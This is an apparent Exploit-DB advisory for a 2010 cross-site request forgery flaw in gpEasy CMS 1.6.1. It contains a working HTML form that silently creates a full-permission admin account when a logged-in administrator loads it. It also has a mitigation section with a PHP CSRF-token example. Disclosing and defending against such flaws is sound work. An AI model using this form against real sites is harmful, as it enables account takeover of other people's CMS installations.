Vendor: gpeasy
By: Giuseppe 'giudinvx' D'Inverno
CVSS: 8,8 (HIGH)
Vulnerability: Cross-Site Request Forgery (CSRF)
CWE: 352
Product Name: gpeasy
Affected Version From: 1.6.1
Affected Version To: 1.6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:gpeasy:gpeasy
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit

This exploit allows an attacker to add an admin user to the gpEasy CMS through a maliciously crafted POST request to the vulnerable application's index.php/Admin_Users page. The request specifies the username, password, and email address of the new admin user, together with the admin permissions to grant. The exploit code provided is an HTML form that contains the necessary fields and posts them to the vulnerable application.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.
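
One way to implement the token check named above, as an added example in PHP (the language gpEasy is written in). It is not gpEasy's code: the function names, the csrf_token field name and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example, not gpEasy code: function names and the 'csrf_token'
// field/session key are assumptions made for illustration.

// Return this session's token, creating it on first use.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to emit inside every state-changing admin form.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_issue($session), ENT_QUOTES) . '">';
}

// True only when the POST body carries this session's token.
function csrf_check(array $session, array $post): bool {
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // is_string() guards against array input such as csrf_token[]=x
    return is_string($expected) && $expected !== '' && is_string($given)
        && hash_equals($expected, $given); // constant-time comparison
}

// Gate for the cmd=newuser action: refuse before any account is created.
function handle_newuser(array $session, array $post): int {
    if (($post['cmd'] ?? '') !== 'newuser') {
        return 400;
    }
    if (!csrf_check($session, $post)) {
        return 403; // cross-site form post: no token, or a wrong one
    }
    // ... the application's existing user-creation logic runs here ...
    return 200;
}

// Constructed requests; a real handler would pass $_SESSION and $_POST.
$session = [];
echo csrf_field($session), "\n";
$token   = $session['csrf_token'];
$forged  = ['cmd' => 'newuser', 'username' => 'xxx', 'grant' => ['Admin_Users']];
$legit   = $forged + ['csrf_token' => $token];
$array   = ['cmd' => 'newuser', 'csrf_token' => ['x']];

foreach (['forged' => $forged, 'legit' => $legit, 'array token' => $array] as $name => $post) {
    echo $name, ': ', handle_newuser($session, $post), "\n";
}
```

The token has to be emitted in every form that changes state and checked on the server before the action runs; a post without it, such as the form in this advisory, is then refused.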
Source

Exploit-DB raw data:

=============================================
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
=============================================

Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-29-2010
Site     : http://www.giudinvx.altervista.org/
Location : Naples, Italy

--------------------------------------------------------
Application Info
Site   : http://www.gpeasy.com/
Version: 1.6.1
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" action="[path]/index.php/Admin_Users">
<input type="text" value="xxx" name="username"><br/>
<input type="password" value="xxx" name="password"><br/>
<input type="password" value="xxx" name="password1"><br/>
<input type="text" value="xxx" name="email"><br/>
<input value="Admin_Menu" type="hidden" name="grant[]">
<input value="Admin_Uploaded" type="hidden" name="grant[]">
<input value="Admin_Extra" type="hidden" name="grant[]">
<input value="Admin_Theme" type="hidden" name="grant[]">
<input value="Admin_Users" type="hidden" name="grant[]">
<input value="Admin_Configuration" type="hidden" name="grant[]">
<input value="Admin_Trash" type="hidden" name="grant[]">
<input value="Admin_Uninstall" type="hidden" name="grant[]">
<input value="Admin_Addons" type="hidden" name="grant[]">
<input value="Admin_New" type="hidden" name="grant[]">
<input value="Admin_Theme_Content" type="hidden" name="grant[]">
<input type="hidden" value="newuser" name="cmd">
<input type="submit" value="Continue" name="aaa" class="submit">
</form>
</html>

# Now you have an Admin user with name: xxx and password: xxx; just log in at the page [path]/index.php/Admin